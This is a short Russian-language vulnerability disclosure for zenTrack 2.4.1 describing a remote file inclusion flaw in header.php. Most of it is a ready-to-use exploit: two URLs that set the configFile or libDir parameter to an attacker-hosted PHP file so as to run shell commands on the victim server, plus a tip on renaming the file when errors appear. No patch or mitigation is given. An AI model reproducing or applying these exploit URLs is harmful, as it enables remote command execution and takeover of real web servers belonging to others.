Уязвимый продукт : zenTrack 2.4.1 (ранние?) и следующие
Сайт создателя : http://zendocs.phpzen.net/zentrack/

Уязвимость в header.php позволяет атакующим выполнять команды с правами вебсервера. Пример:

http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php? cmd=pwd

или

Создайте файл translator.class где-нибудь у себя на сервере, содержащий php код, который позволит вам исполнят ькоманды. К примеру, я создал файл translator.class в папке
test:

http://[victim]/zentrack/www/index.php?libDir=http:// [attacker]/test/&cmd=pwd

Если начинают вылезать ошибки копируйте translator.class в zenTrack.class.



Оставить мнение